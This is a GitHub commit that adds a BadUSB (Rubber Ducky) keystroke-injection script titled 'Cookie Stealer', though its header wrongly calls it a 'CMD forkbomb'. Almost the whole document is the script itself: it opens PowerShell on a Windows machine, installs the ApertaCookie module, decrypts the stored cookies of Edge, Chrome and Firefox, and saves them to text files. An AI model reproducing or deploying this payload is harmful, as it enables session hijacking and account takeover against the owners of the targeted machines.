Added Cookie Stealer (thanks 7h30th3r0n3!)

This commit is contained in:
UberGuidoZ 2022-07-16 21:38:17 -07:00 committed by GitHub
parent 64d5109de1
commit 802f112eec
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

37
BadUSB/Cookie-Stealer.txt Normal file
View File

@ -0,0 +1,37 @@
REM Title: CMD forkbomb
REM Author: 7h30th3r0n3
REM Target: Windows 7/8/10/11
REM Version: 1.0
REM Category: Grabber
REM Create 3 files with cookies stolen from browsers with ApertaCookie
GUI r
delay 100
STRING powershell
ENTER
delay 300
STRING Install-Module -Name "ApertaCookie" -Scope CurrentUser -Force
ENTER
delay 200
STRING Import-Module -Name "ApertaCookie"
ENTER
delay 200
STRING $allChromeCookie = Get-RawCookiesFromDB -Browser Chrome
ENTER
delay 200
STRING $session = Get-DecryptedCookiesInfo -Browser Edge
ENTER
delay 200
STRING $session2 = Get-DecryptedCookiesInfo -Browser Chrome
ENTER
DELAY 200
STRING $session3 = Get-DecryptedCookiesInfo -Browser Firefox
ENTER
delay 200
STRING Add-Content -Path cookie-edge.txt -Value $session
ENTER
STRING Add-Content -Path cookie-chrome.txt -Value $session2
ENTER
STRING Add-Content -Path cookie-firefox.txt -Value $session3
ENTER
STRING exit
ENTER